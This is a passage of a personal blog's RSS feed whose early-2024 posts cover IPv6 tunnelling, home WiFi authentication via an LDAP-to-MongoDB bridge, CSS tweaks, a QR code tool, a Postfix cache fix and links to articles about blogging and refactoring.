  1863. <p>(<a href="" title="Fifty Things you can do with a Software Defined Radio | Hacker News">via</a>)</p>
  1864. <p>Also using this post to introduce a new category: <b><a href="" title="x-log - Radio">Radio</a></b><br>
  1865. Which will serve as a container for radio/HAM/Wireless related content.</p>
  1866. ]]></description>
  1867.    <content:encoded><![CDATA[<p><a href="" title="Fifty Things you can do with a Software Defined Radio">Fifty Things you can do with a Software Defined Radio 📻</a> &mdash; some cool SDR things to do (have done already some of them and more with my <a href="" title="Tango Foxtrott Wireless Society HB9TF">HB9TF</a> friends :-)</p>
  1868. <p>(<a href="" title="Fifty Things you can do with a Software Defined Radio | Hacker News">via</a>)</p>
  1869. <p>Also using this post to introduce a new category: <b><a href="" title="x-log - Radio">Radio</a></b><br>
  1870. Which will serve as a container for radio/HAM/Wireless related content.</p>
  1871. ]]></content:encoded>
  1872.  </item>
  1874.  <item>
  1875.    <title>100 things you can do on your personal website</title>
  1876.    <link></link>
  1877.    <guid isPermaLink="true"></guid>
  1878.    <dc:creator>Andreas Jaggi</dc:creator>
  1879.    <creativeCommons:license></creativeCommons:license>
  1880.    <pubDate>Thu, 07 Mar 2024 23:56:00 +0100</pubDate>
  1881.    <category domain="">Misc</category>
  1882.    <description><![CDATA[<p><a href="" title="100 things you can do on your personal website | James' Coffee Blog">100 things you can do on your personal website</a> &mdash; lots of ideas/inspirations also for this blog :-)</p>
  1883. <p>(<a href="" title="">via</a>)</p>
  1884. ]]></description>
  1885.    <content:encoded><![CDATA[<p><a href="" title="100 things you can do on your personal website | James' Coffee Blog">100 things you can do on your personal website</a> &mdash; lots of ideas/inspirations also for this blog :-)</p>
  1886. <p>(<a href="" title="">via</a>)</p>
  1887. ]]></content:encoded>
  1888.  </item>
  1890.  <item>
  1891.    <title>Tunnelbroker to the rescue</title>
  1892.    <link></link>
  1893.    <guid isPermaLink="true"></guid>
  1894.    <dc:creator>Andreas Jaggi</dc:creator>
  1895.    <creativeCommons:license></creativeCommons:license>
  1896.    <pubDate>Sun, 25 Feb 2024 15:25:00 +0100</pubDate>
  1897.    <category domain="">Networking</category>
  1898.    <description><![CDATA[<p>After nicely delivering <a href="" title="x-log - Embracing the future with Solnet">native IPv6 connectivity for 3 years</a>, my Internet provider Solnet made some changes in their backbone config on January 31st which broke their IPv6 setup.<br>Unfortunately escalating with their support did not bear any fruits so far (current state: they no longer respond on the support ticket&hellip;).</p>
  1899. <p>Thus change of plans, <a href="" title="Hurricane Electric Free IPv6 Tunnel Broker"></a> (Hurricane Electric) to the rescue.<br>Took about 10 minutes to set everything up and now I'm enjoying IPv6 connectivity again (although with a reduced end-to-end MTU due to the <a href="" title="6in4 - Wikipedia">6in4</a> encapsulation).</p>
  1900. <p>Guess I'll have to look for a different Internet provider again.<br>Especially annoying is that I renewed the yearly plan with Solnet only a couple weeks ago, so will be stuck without native IPv6 connectivity for the next 11 months :-(</p>
  1901. ]]></description>
  1902.    <content:encoded><![CDATA[<p>After nicely delivering <a href="" title="x-log - Embracing the future with Solnet">native IPv6 connectivity for 3 years</a>, my Internet provider Solnet made some changes in their backbone config on January 31st which broke their IPv6 setup.<br>Unfortunately escalating with their support did not bear any fruits so far (current state: they no longer respond on the support ticket&hellip;).</p>
  1903. <p>Thus change of plans, <a href="" title="Hurricane Electric Free IPv6 Tunnel Broker"></a> (Hurricane Electric) to the rescue.<br>Took about 10 minutes to set everything up and now I'm enjoying IPv6 connectivity again (although with a reduced end-to-end MTU due to the <a href="" title="6in4 - Wikipedia">6in4</a> encapsulation).</p>
  1904. <p>Guess I'll have to look for a different Internet provider again.<br>Especially annoying is that I renewed the yearly plan with Solnet only a couple weeks ago, so will be stuck without native IPv6 connectivity for the next 11 months :-(</p>
  1905. ]]></content:encoded>
  1906.  </item>
  1908.  <item>
  1909.    <title>The High-Risk Refactoring</title>
  1910.    <link></link>
  1911.    <guid isPermaLink="true"></guid>
  1912.    <dc:creator>Andreas Jaggi</dc:creator>
  1913.    <creativeCommons:license></creativeCommons:license>
  1914.    <pubDate>Sun, 25 Feb 2024 04:02:00 +0100</pubDate>
  1915.    <category domain="">Coding</category>
  1916.    <description><![CDATA[<p>In the <a href="" title="The High-Risk Refactoring - Miroslav Nikolov">The High-Risk Refactoring</a> article there is this concise <em>Addressing Risk</em> checklist to keep in mind when refactoring.<br>During past refactorings (also low-risk ones) I often used almost the same guidelines to help me and can only recommend you to do the same:</p>
  1917. <blockquote cite="">
  1918. <p>✅ Define constraints. <em>How far should I go</em>. <br>
  1919. ✅ Isolate improvements from features. <em>Do not apply them simultaneously</em>. <br>
  1920. ✅ Write extensive tests. <em>Higher level (integration) with fewer implementation details. They should run alongside changes</em>. <br>
  1921. ✅ Have a visual confirmation. <em>Open the browser</em>.</p>
  1922. <p>❌ Do not skip tests. <em>Don't be lazy</em>.<br>
  1923. ❌ Do not rely too much on code reviews and QA. <em>Humans make mistakes</em>.<br>
  1924. ❌ Do not mix expensive cleanups with other changes. <em>But do that for small improvements</em>.</p>
  1925. </blockquote>
  1926. <p>(<a href="" title="Weekend Reading - Places where I've lost my glasses - Labnotes (by Assaf Arkin)">via</a>)</p>
  1927. ]]></description>
  1928.    <content:encoded><![CDATA[<p>In the <a href="" title="The High-Risk Refactoring - Miroslav Nikolov">The High-Risk Refactoring</a> article there is this concise <em>Addressing Risk</em> checklist to keep in mind when refactoring.<br>During past refactorings (also low-risk ones) I often used almost the same guidelines to help me and can only recommend you to do the same:</p>
  1929. <blockquote cite="">
  1930. <p>✅ Define constraints. <em>How far should I go</em>. <br>
  1931. ✅ Isolate improvements from features. <em>Do not apply them simultaneously</em>. <br>
  1932. ✅ Write extensive tests. <em>Higher level (integration) with fewer implementation details. They should run alongside changes</em>. <br>
  1933. ✅ Have a visual confirmation. <em>Open the browser</em>.</p>
  1934. <p>❌ Do not skip tests. <em>Don't be lazy</em>.<br>
  1935. ❌ Do not rely too much on code reviews and QA. <em>Humans make mistakes</em>.<br>
  1936. ❌ Do not mix expensive cleanups with other changes. <em>But do that for small improvements</em>.</p>
  1937. </blockquote>
  1938. <p>(<a href="" title="Weekend Reading - Places where I've lost my glasses - Labnotes (by Assaf Arkin)">via</a>)</p>
  1939. ]]></content:encoded>
  1940.  </item>
  1942.  <item>
  1943.    <title>Please Blog</title>
  1944.    <link></link>
  1945.    <guid isPermaLink="true"></guid>
  1946.    <dc:creator>Andreas Jaggi</dc:creator>
  1947.    <creativeCommons:license></creativeCommons:license>
  1948.    <pubDate>Sun, 25 Feb 2024 03:17:00 +0100</pubDate>
  1949.    <category domain="">Misc</category>
  1950.    <description><![CDATA[<p><a href="" title=" - PLEASE Blog">Please Blog</a> &mdash; <em>a plea for less Big Web and more Small Web</em> and an encouraging article to write your own blog. It also touches on the part about writing on your own domain (so to keep your content yours and not be at risk of a third-party commercial 'social' service going away).</p>
  1951. <blockquote cite=""><p>Don’t wait for the Pulitzer piece. Tell me about your ride to work, about your food, what flavor ice cream you like. Let me be part of happiness and sadness. Show me, that there is a human being out there that, agree or not, I can relate to. Because without it, we are just actors in a sea of actors, marketing, proselytizing, advocating, and threatening towards each other in an always vicious circle of striving for a relevance that only buys us more marketing, more proselytizing, more advocating, and more threats.</p></blockquote>
  1952. <p>(discovered via <a href="" title="Links, Links, Links | Thomas Gigold - Blog">Thomas Gigold</a>)</p>
  1953. ]]></description>
  1954.    <content:encoded><![CDATA[<p><a href="" title=" - PLEASE Blog">Please Blog</a> &mdash; <em>a plea for less Big Web and more Small Web</em> and an encouraging article to write your own blog. It also touches on the part about writing on your own domain (so to keep your content yours and not be at risk of a third-party commercial 'social' service going away).</p>
  1955. <blockquote cite=""><p>Don’t wait for the Pulitzer piece. Tell me about your ride to work, about your food, what flavor ice cream you like. Let me be part of happiness and sadness. Show me, that there is a human being out there that, agree or not, I can relate to. Because without it, we are just actors in a sea of actors, marketing, proselytizing, advocating, and threatening towards each other in an always vicious circle of striving for a relevance that only buys us more marketing, more proselytizing, more advocating, and more threats.</p></blockquote>
  1956. <p>(discovered via <a href="" title="Links, Links, Links | Thomas Gigold - Blog">Thomas Gigold</a>)</p>
  1957. ]]></content:encoded>
  1958.  </item>
  1960.  <item>
  1961.    <title>ads.txt</title>
  1962.    <link></link>
  1963.    <guid isPermaLink="true"></guid>
  1964.    <dc:creator>Andreas Jaggi</dc:creator>
  1965.    <creativeCommons:license></creativeCommons:license>
  1966.    <pubDate>Sun, 18 Feb 2024 17:38:00 +0100</pubDate>
  1967.    <category domain="">Webdesign</category>
  1968.    <description><![CDATA[<p>Added and <a href="" title="IAB Tech Lab - Ads.txt - Authorized Digital Sellers">ads.txt</a> file to the blog. The idea is to avoid that someone can sell fake advertisment space for this blog.</p>
  1969. <p>As I don't use any advertisment here the content of the file is pretty basic:</p>
  1970. <pre>contact=</pre>
  1971. ]]></description>
  1972.    <content:encoded><![CDATA[<p>Added and <a href="" title="IAB Tech Lab - Ads.txt - Authorized Digital Sellers">ads.txt</a> file to the blog. The idea is to avoid that someone can sell fake advertisment space for this blog.</p>
  1973. <p>As I don't use any advertisment here the content of the file is pretty basic:</p>
  1974. <pre>contact=</pre>
  1975. ]]></content:encoded>
  1976.  </item>
  1978.  <item>
  1979.    <title>ldapauth</title>
  1980.    <link></link>
  1981.    <guid isPermaLink="true"></guid>
  1982.    <dc:creator>Andreas Jaggi</dc:creator>
  1983.    <creativeCommons:license></creativeCommons:license>
  1984.    <pubDate>Sun, 18 Feb 2024 15:37:00 +0100</pubDate>
  1985.    <category domain="">Linux</category>
  1986.    <description><![CDATA[<p><a href="" title="x-way/ldapauth">ldapauth</a> is a <a href="" title="Node.js">Node.js</a> script which I have been using for the last 12+ years mostly unchanged.</p>
  1987. <p>It started its life in a <a href="" title="Linux Containers (LXC)">LXC</a> container, eventually was moved to a Docker container and recently ended up in its own repository on GitHub.</p>
  1988. <p>The functionality it provides is not extraordinary, but helped to bridge a gap where no other product was available.<br>
  1989. It talks <a href="" title="Lightweight Directory Access Protocol - Wikipedia">LDAP</a> one one side (although limited to handle user lookup requests) and on the other side connects to a <a href="" title="MongoDB - Document Oriented Database">MongoDB</a> database where the information is stored.</p>
  1990. <p>It emerged out of the desire to have an easy way to manage individual user accounts for my home WiFi. I already had MongoDB running for some other personal project and simply added the list of users there (including the UI for managing them).<br>
  1991. Thus the missing part was to get the WiFi accesspoint to lookup user accounts in MongoDB.</p>
  1992. <p>Of course WiFi accesspoints do not directly talk MongoDB, but rather some other protocol like <a href="" title="Remote Authentication Dial-In User Service">RADIUS</a>.<br>
  1993. A <a href="" title="FreeRADIUS">freeradius</a> server was quickly setup, but still couldn't talk to MongoDB at the time. Thus comes in <a href="" title="x-way/ldapauth">ldapauth</a>, which takes LDAP queries from freeradius and turns them into MongoDB lookups so that in the end the WiFi accesspoint receives the user accounts :-)</p>
  1994. <p>Not sure if this is particularly useful for anyone else, but at least here it did provide good services (and continues to do so).<br>
  1995. Current score is that it has survived three different WiFi accesspoints and has been running on 5 different servers over the time.</p>
  1996. ]]></description>
  1997.    <content:encoded><![CDATA[<p><a href="" title="x-way/ldapauth">ldapauth</a> is a <a href="" title="Node.js">Node.js</a> script which I have been using for the last 12+ years mostly unchanged.</p>
  1998. <p>It started its life in a <a href="" title="Linux Containers (LXC)">LXC</a> container, eventually was moved to a Docker container and recently ended up in its own repository on GitHub.</p>
  1999. <p>The functionality it provides is not extraordinary, but helped to bridge a gap where no other product was available.<br>
  2000. It talks <a href="" title="Lightweight Directory Access Protocol - Wikipedia">LDAP</a> one one side (although limited to handle user lookup requests) and on the other side connects to a <a href="" title="MongoDB - Document Oriented Database">MongoDB</a> database where the information is stored.</p>
  2001. <p>It emerged out of the desire to have an easy way to manage individual user accounts for my home WiFi. I already had MongoDB running for some other personal project and simply added the list of users there (including the UI for managing them).<br>
  2002. Thus the missing part was to get the WiFi accesspoint to lookup user accounts in MongoDB.</p>
  2003. <p>Of course WiFi accesspoints do not directly talk MongoDB, but rather some other protocol like <a href="" title="Remote Authentication Dial-In User Service">RADIUS</a>.<br>
  2004. A <a href="" title="FreeRADIUS">freeradius</a> server was quickly setup, but still couldn't talk to MongoDB at the time. Thus comes in <a href="" title="x-way/ldapauth">ldapauth</a>, which takes LDAP queries from freeradius and turns them into MongoDB lookups so that in the end the WiFi accesspoint receives the user accounts :-)</p>
  2005. <p>Not sure if this is particularly useful for anyone else, but at least here it did provide good services (and continues to do so).<br>
  2006. Current score is that it has survived three different WiFi accesspoints and has been running on 5 different servers over the time.</p>
  2007. ]]></content:encoded>
  2008.  </item>
  2010.  <item>
  2011.    <title>Hilltop Hoods - Laced Up</title>
  2012.    <link></link>
  2013.    <guid isPermaLink="true"></guid>
  2014.    <dc:creator>Andreas Jaggi</dc:creator>
  2015.    <creativeCommons:license></creativeCommons:license>
  2016.    <pubDate>Sun, 18 Feb 2024 08:31:00 +0100</pubDate>
  2017.    <category domain="">Music</category>
  2018.    <description><![CDATA[<p><a href="" title="Hilltop Hoods - Laced Up - YouTube">Hilltop Hoods - Laced Up</a></p>
  2019. <p>Some vibes from Australia &#x2764;</p>
  2020. ]]></description>
  2021.    <content:encoded><![CDATA[<p><a href="" title="Hilltop Hoods - Laced Up - YouTube">Hilltop Hoods - Laced Up</a></p>
  2022. <p>Some vibes from Australia &#x2764;</p>
  2023. ]]></content:encoded>
  2024.  </item>
  2026.  <item>
  2027.    <title>qr-bag</title>
  2028.    <link></link>
  2029.    <guid isPermaLink="true"></guid>
  2030.    <dc:creator>Andreas Jaggi</dc:creator>
  2031.    <creativeCommons:license></creativeCommons:license>
  2032.    <pubDate>Sat, 03 Feb 2024 19:55:00 +0100</pubDate>
  2033.    <category domain="">Coding</category>
  2034.    <description><![CDATA[<p>Some time ago I used an online tool to generate some QR codes with a contact URL so I can put them on my luggage.<br>Now I got a new bag and need a new QR code for it. As I don't remember the online tool I used years ago, I decided to write my own tool.</p>
  2035. <p>Thus say hello to <a href="" title="x-way/qr-bag: Generate a QR code with a lost bag logo in the middle pointing to a URL with information about the owner ">qr-bag</a>. It's a commandline tool written in Go to generate QR codes for URLs with a little logo in the middle.<br>The code for it is mostly a wrapper around the <a href="" title="yeqown/go-qrcode">go-qrcode</a> library which does all the heavy lifting.</p>
  2036. <img src="" width="173" height="173" alt="Example QR code">
  2037. ]]></description>
  2038.    <content:encoded><![CDATA[<p>Some time ago I used an online tool to generate some QR codes with a contact URL so I can put them on my luggage.<br>Now I got a new bag and need a new QR code for it. As I don't remember the online tool I used years ago, I decided to write my own tool.</p>
  2039. <p>Thus say hello to <a href="" title="x-way/qr-bag: Generate a QR code with a lost bag logo in the middle pointing to a URL with information about the owner ">qr-bag</a>. It's a commandline tool written in Go to generate QR codes for URLs with a little logo in the middle.<br>The code for it is mostly a wrapper around the <a href="" title="yeqown/go-qrcode">go-qrcode</a> library which does all the heavy lifting.</p>
  2040. <img src="" width="173" height="173" alt="Example QR code">
  2041. ]]></content:encoded>
  2042.  </item>
  2044.  <item>
  2045.    <title>text-decoration-color</title>
  2046.    <link></link>
  2047.    <guid isPermaLink="true"></guid>
  2048.    <dc:creator>Andreas Jaggi</dc:creator>
  2049.    <creativeCommons:license></creativeCommons:license>
  2050.    <pubDate>Sat, 03 Feb 2024 16:27:00 +0100</pubDate>
  2051.    <category domain="">Webdesign</category>
  2052.    <description><![CDATA[<p>Just discovered the <a href="" title="text-decoration-color - CSS: Cascading Style Sheets | MDN"><code>text-decoration-color</code></a> CSS property and added it to the style on the blog:</p>
  2053. <pre>a:hover {color: #454545; text-decoration: underline; text-decoration-color: #26C4FF;}</pre>
  2054. <p>This causes that when you hover over a link in a post, the underline is not in the same boring gray as the text but lights up in a nice color :-)</p>
  2055. <p>(not to be confused with the hacky colored underlines in the righthand navigation bar, where I use a colored <code>border-bottom</code> to achieve a similar effect since 2002)</p>
  2056. ]]></description>
  2057.    <content:encoded><![CDATA[<p>Just discovered the <a href="" title="text-decoration-color - CSS: Cascading Style Sheets | MDN"><code>text-decoration-color</code></a> CSS property and added it to the style on the blog:</p>
  2058. <pre>a:hover {color: #454545; text-decoration: underline; text-decoration-color: #26C4FF;}</pre>
  2059. <p>This causes that when you hover over a link in a post, the underline is not in the same boring gray as the text but lights up in a nice color :-)</p>
  2060. <p>(not to be confused with the hacky colored underlines in the righthand navigation bar, where I use a colored <code>border-bottom</code> to achieve a similar effect since 2002)</p>
  2061. ]]></content:encoded>
  2062.  </item>
  2064.  <item>
  2065.    <title>Blogroll cleanup 2024</title>
  2066.    <link></link>
  2067.    <guid isPermaLink="true"></guid>
  2068.    <dc:creator>Andreas Jaggi</dc:creator>
  2069.    <creativeCommons:license></creativeCommons:license>
  2070.    <pubDate>Wed, 31 Jan 2024 22:50:00 +0100</pubDate>
  2071.    <category domain="">Misc</category>
  2072.    <description><![CDATA[<p>It's time again to do some cleanup of my blogroll before the links start to turn into 404 errors :-)</p>
  2073. <p>Removed:</p>
  2074. <ul>
  2075. <li><a href="" title="Veni, Vidi, VISA">Veni, Vidi, VISA</a></li>
  2076. <li><a href="" title="grugq's domain - Cyber is Deception"></a></li>
  2077. <li><a href="" title="BrewDog Craft Beer Blog">BrewDog</a></li>
  2078. <li><a href="" title="Matt Layher"></a></li>
  2079. <li><a href="" title="Inliniac | Everything inline.">Inliniac</a></li>
  2080. <li><a href="" title="To Linux and beyond!">To Linux and beyond!</a></li>
  2081. <li><a href="" title="The Lone Sysadmin">The Lone Sysadmin</a></li>
  2082. <li><a href="" title="Evan Klitzke"></a></li>
  2083. </ul>
  2084. ]]></description>
  2085.    <content:encoded><![CDATA[<p>It's time again to do some cleanup of my blogroll before the links start to turn into 404 errors :-)</p>
  2086. <p>Removed:</p>
  2087. <ul>
  2088. <li><a href="" title="Veni, Vidi, VISA">Veni, Vidi, VISA</a></li>
  2089. <li><a href="" title="grugq's domain - Cyber is Deception"></a></li>
  2090. <li><a href="" title="BrewDog Craft Beer Blog">BrewDog</a></li>
  2091. <li><a href="" title="Matt Layher"></a></li>
  2092. <li><a href="" title="Inliniac | Everything inline.">Inliniac</a></li>
  2093. <li><a href="" title="To Linux and beyond!">To Linux and beyond!</a></li>
  2094. <li><a href="" title="The Lone Sysadmin">The Lone Sysadmin</a></li>
  2095. <li><a href="" title="Evan Klitzke"></a></li>
  2096. </ul>
  2097. ]]></content:encoded>
  2098.  </item>
  2100.  <item>
  2101.    <title>Statistics revived</title>
  2102.    <link></link>
  2103.    <guid isPermaLink="true"></guid>
  2104.    <dc:creator>Andreas Jaggi</dc:creator>
  2105.    <creativeCommons:license></creativeCommons:license>
  2106.    <pubDate>Tue, 30 Jan 2024 06:46:00 +0100</pubDate>
  2107.    <category domain="">Misc</category>
  2108.    <description><![CDATA[<p>Following in the trend of replacing tables, I've revived the old <a href="" title="x-log - Statistics">statistics page</a>.<br>Now using less markup as it is built with <code>&lt;div&gt;</code> and CSS only (the <code>display: inline-block;</code> property was particularly helpful).</p>
  2109. <p>(the Jekyll/Liquid templating to generate the data for it looks quite horrific though&hellip;)</p>
  2110. ]]></description>
  2111.    <content:encoded><![CDATA[<p>Following in the trend of replacing tables, I've revived the old <a href="" title="x-log - Statistics">statistics page</a>.<br>Now using less markup as it is built with <code>&lt;div&gt;</code> and CSS only (the <code>display: inline-block;</code> property was particularly helpful).</p>
  2112. <p>(the Jekyll/Liquid templating to generate the data for it looks quite horrific though&hellip;)</p>
  2113. ]]></content:encoded>
  2114.  </item>
  2116.  <item>
  2117.    <title>Tables are gone</title>
  2118.    <link></link>
  2119.    <guid isPermaLink="true"></guid>
  2120.    <dc:creator>Andreas Jaggi</dc:creator>
  2121.    <creativeCommons:license></creativeCommons:license>
  2122.    <pubDate>Sun, 28 Jan 2024 16:47:00 +0100</pubDate>
  2123.    <category domain="">Webdesign</category>
  2124.    <description><![CDATA[<p>Over the last couple weeks I slowly replaced the various &lt;table&gt;-based layout elements of the blog with more modern HTML elements.<br>
  2125. And finally this afternoon the work was completed with the last &lt;table&gt; element gone.</p>
  2126. <p>Visually there should be almost no differences, but in case something looks strange just let <a href="" title="x-log - About">me</a> know :-)<br>
  2127. (and yes, style-wise everything is still using the pixel-based layout from 2002, one day this might change as well&hellip;)</p>
  2128. ]]></description>
  2129.    <content:encoded><![CDATA[<p>Over the last couple weeks I slowly replaced the various &lt;table&gt;-based layout elements of the blog with more modern HTML elements.<br>
  2130. And finally this afternoon the work was completed with the last &lt;table&gt; element gone.</p>
  2131. <p>Visually there should be almost no differences, but in case something looks strange just let <a href="" title="x-log - About">me</a> know :-)<br>
  2132. (and yes, style-wise everything is still using the pixel-based layout from 2002, one day this might change as well&hellip;)</p>
  2133. ]]></content:encoded>
  2134.  </item>
  2136.  <item>
  2137.    <title>Quick and dirty dark mode</title>
  2138.    <link></link>
  2139.    <guid isPermaLink="true"></guid>
  2140.    <dc:creator>Andreas Jaggi</dc:creator>
  2141.    <creativeCommons:license></creativeCommons:license>
  2142.    <pubDate>Sat, 27 Jan 2024 15:59:00 +0100</pubDate>
  2143.    <category domain="">Webdesign</category>
  2144.    <description><![CDATA[<p>To provide basic dark mode support for the blog, I added the following lines of CSS:</p>
  2145. <pre>
  2146. @media (prefers-color-scheme: dark) {
  2147.    html { filter: invert(1) hue-rotate(180deg); }
  2148.    img, video, iframe { filter: invert(1) hue-rotate(180deg); }
  2149. }
  2150. </pre>
  2151. <p>If the browser/OS has dark mode enabled it will invert the colors and rotate the hue to achieve the dark mode effect.<br>The whole operation is applied a second time on images, videos and frames to avoid that they have their colors distorted.</p>
  2152. <p>You can get a preview by using the developer tools of your browser to enable dark mode :-)</p>
  2153. <p>The code is inspired by the post <a href="" title="One line - Dark Mode using CSS - DEV Community">here</a>, and then extended to provide a CSS-only solution by leveraging the <a href="" title="color-scheme - CSS: Cascading Style Sheets | MDN">color-scheme CSS property</a>.</p>
  2154. ]]></description>
  2155.    <content:encoded><![CDATA[<p>To provide basic dark mode support for the blog, I added the following lines of CSS:</p>
  2156. <pre>
  2157. @media (prefers-color-scheme: dark) {
  2158.    html { filter: invert(1) hue-rotate(180deg); }
  2159.    img, video, iframe { filter: invert(1) hue-rotate(180deg); }
  2160. }
  2161. </pre>
  2162. <p>If the browser/OS has dark mode enabled it will invert the colors and rotate the hue to achieve the dark mode effect.<br>The whole operation is applied a second time on images, videos and frames to avoid that they have their colors distorted.</p>
  2163. <p>You can get a preview by using the developer tools of your browser to enable dark mode :-)</p>
  2164. <p>The code is inspired by the post <a href="" title="One line - Dark Mode using CSS - DEV Community">here</a>, and then extended to provide a CSS-only solution by leveraging the <a href="" title="color-scheme - CSS: Cascading Style Sheets | MDN">color-scheme CSS property</a>.</p>
  2165. ]]></content:encoded>
  2166.  </item>
  2168.  <item>
  2169.    <title>Sub Focus, Dimension, Culture Shock &#x26; 1991</title>
  2170.    <link></link>
  2171.    <guid isPermaLink="true"></guid>
  2172.    <dc:creator>Andreas Jaggi</dc:creator>
  2173.    <creativeCommons:license></creativeCommons:license>
  2174.    <pubDate>Sun, 21 Jan 2024 22:16:00 +0100</pubDate>
  2175.    <category domain="">Music</category>
  2176.    <description><![CDATA[<p><a href="" title="Sub Focus, Dimension, Culture Shock &amp; 1991 - YouTube">Sub Focus, Dimension, Culture Shock &amp; 1991</a></p>
  2177. <p>Some very fine Drum and bass. Recently got to experience two of them live (Sub Focus &amp; 1991), and have plans to see Dimension next :-)</p>
  2178. <p>Especially like the little <a href="" title="The Prodigy">The Prodigy</a> mixin starting at 1:04:30 &#x1F973;</p>
  2179. ]]></description>
  2180.    <content:encoded><![CDATA[<p><a href="" title="Sub Focus, Dimension, Culture Shock &amp; 1991 - YouTube">Sub Focus, Dimension, Culture Shock &amp; 1991</a></p>
  2181. <p>Some very fine Drum and bass. Recently got to experience two of them live (Sub Focus &amp; 1991), and have plans to see Dimension next :-)</p>
  2182. <p>Especially like the little <a href="" title="The Prodigy">The Prodigy</a> mixin starting at 1:04:30 &#x1F973;</p>
  2183. ]]></content:encoded>
  2184.  </item>
  2186.  <item>
  2187.    <title>Keeping old URLs alive</title>
  2188.    <link></link>
  2189.    <guid isPermaLink="true"></guid>
  2190.    <dc:creator>Andreas Jaggi</dc:creator>
  2191.    <creativeCommons:license></creativeCommons:license>
  2192.    <pubDate>Sun, 21 Jan 2024 21:41:00 +0100</pubDate>
  2193.    <category domain="">Misc</category>
  2194.    <description><![CDATA[<p>As mentioned before, I'm a supporter of the <a href="" title="Hypertext Style: Cool URIs don't change">Cool URIs don't change</a> approach.<br>Thus I try to keep all the URLs of this blog working (or at least make them redirect to the new place where the content is located).<br>Not always an easy task with old domains and multiple blogging engines accumulated over the years.</p>
  2195. <p>To help me with that (and ensure I don't break anything when updating a 10+ year old mod_rewrite config) I created a short Bash script to test the redirect behavior.<br>It contains a list of URLs and their expected redirect target, goes through them with <a href="" title="curl">curl</a> and checks that the correct <code>Location:</code> header is returned.</p>
  2196. <p>As it might be useful for others in similar situations, the script can be found <a href="" title="">here</a>.</p>
  2197. ]]></description>
  2198.    <content:encoded><![CDATA[<p>As mentioned before, I'm a supporter of the <a href="" title="Hypertext Style: Cool URIs don't change">Cool URIs don't change</a> approach.<br>Thus I try to keep all the URLs of this blog working (or at least make them redirect to the new place where the content is located).<br>Not always an easy task with old domains and multiple blogging engines accumulated over the years.</p>
  2199. <p>To help me with that (and ensure I don't break anything when updating a 10+ year old mod_rewrite config) I created a short Bash script to test the redirect behavior.<br>It contains a list of URLs and their expected redirect target, goes through them with <a href="" title="curl">curl</a> and checks that the correct <code>Location:</code> header is returned.</p>
  2200. <p>As it might be useful for others in similar situations, the script can be found <a href="" title="">here</a>.</p>
  2201. ]]></content:encoded>
  2202.  </item>
  2204.  <item>
  2205.    <title>I miss human curation</title>
  2206.    <link></link>
  2207.    <guid isPermaLink="true"></guid>
  2208.    <dc:creator>Andreas Jaggi</dc:creator>
  2209.    <creativeCommons:license></creativeCommons:license>
  2210.    <pubDate>Sun, 21 Jan 2024 07:14:00 +0100</pubDate>
  2211.    <category domain="">Misc</category>
  2212.    <description><![CDATA[<p><a href="" title="I miss human curation - Cassidy's blog">I miss human curation</a> &mdash; Where are my internet friends? And where are their weird blogs? (<a href="" title="Markus Kniebes Journal">via</a>)<p>
  2213. ]]></description>
  2214.    <content:encoded><![CDATA[<p><a href="" title="I miss human curation - Cassidy's blog">I miss human curation</a> &mdash; Where are my internet friends? And where are their weird blogs? (<a href="" title="Markus Kniebes Journal">via</a>)<p>
  2215. ]]></content:encoded>
  2216.  </item>
  2218.  <item>
  2219.    <title>Postfix clear verification cache</title>
  2220.    <link></link>
  2221.    <guid isPermaLink="true"></guid>
  2222.    <dc:creator>Andreas Jaggi</dc:creator>
  2223.    <creativeCommons:license></creativeCommons:license>
  2224.    <pubDate>Sun, 07 Jan 2024 22:38:00 +0100</pubDate>
  2225.    <category domain="">Linux</category>
  2226.    <description><![CDATA[<p>While adding some new alias functionality to my setup, it repeatedly failed with an error similar to this, despite my configuration changes:</p>
  2227. <pre>Recipient address rejected: unverified address: host XXX[XXX] said: 550 5.1.1
  2228. &lt;; User doesn't exist: (in reply to RCPT TO command);</pre>
  2229. <p>Turns out that the negative verification result is cached and the cache is not reset during a reload/restart of postfix.<br>
  2230. Thus it must be cleared manually like this:</p>
  2231. <pre>/etc/init.d/postfix stop
  2232. rm /var/lib/postfix/verify_cache.db
  2233. /etc/init.d/postfix start</pre>
  2234. ]]></description>
  2235.    <content:encoded><![CDATA[<p>While adding some new alias functionality to my setup, it repeatedly failed with an error similar to this, despite my configuration changes:</p>
  2236. <pre>Recipient address rejected: unverified address: host XXX[XXX] said: 550 5.1.1
  2237. &lt;; User doesn't exist: (in reply to RCPT TO command);</pre>
  2238. <p>Turns out that the negative verification result is cached and the cache is not reset during a reload/restart of postfix.<br>
  2239. Thus it must be cleared manually like this:</p>
  2240. <pre>/etc/init.d/postfix stop
  2241. rm /var/lib/postfix/verify_cache.db
  2242. /etc/init.d/postfix start</pre>
  2243. ]]></content:encoded>
  2244.  </item>
  2246.  <item>
  2247.    <title>Valid HTML5</title>
  2248.    <link></link>
  2249.    <guid isPermaLink="true"></guid>
  2250.    <dc:creator>Andreas Jaggi</dc:creator>
  2251.    <creativeCommons:license></creativeCommons:license>
  2252.    <pubDate>Wed, 03 Jan 2024 20:59:00 +0100</pubDate>
  2253.    <category domain="">Webdesign</category>
  2254.    <description><![CDATA[<p>After <a href="" title="Winter - plain 2">switching the colors</a> of the design, I kept the momentum and continued working on the HTML of the blog.</p>
  2255. <p>It took couple iterations of multiple hours, but now it's done: the HTML source of this blog is <a href="" title="Nu HTML Checker">valid HTML5</a>!</p>
  2256. <p>Getting rid of the obsoleteness hidden in old blogentries dating back over 20 years also led to some interesting observations.<br>
  2257. Back when moving from HTML 4.01 to <a href="" title="x-log v2.02c">XHTML 1.1</a>, I remember spending some time to transform old <code>&lt;br&gt;</code> tags to <code>&lt;br /&gt;</code>. And now for HTML5 I did the inverse and moved all <code>&lt;br /&gt;</code> tags back to <code>&lt;br&gt;</code> :-)</p>
  2258. <p>Also once more I'm very thankful for the work of the <a href="" title="Internet Archive">Internet Archive</a>, which helped to recover images hosted on servers long gone (like URLs which already at the end of 2002 were no longer valid!).</p>
  2259. <p>Overall a lot of replacing no longer existing HTML tags and attributes with CSS definitions.<br>And there is virtually no change to the visual representation of the blog (which was the goal), so we still have the table-based layout with pixel-sized fonts as originally drafted in 2002.<br>Moving this to actually leverage modern HTML5 mechanisms and making it also more mobile friendly are tasks left for some future cold winter evenings :-)</p>
  2260. <p><a href="" title="Valid W3C HTML5"><img src="" width="352" height="124" alt="W3C HTML5"></a></p>
  2261. ]]></description>
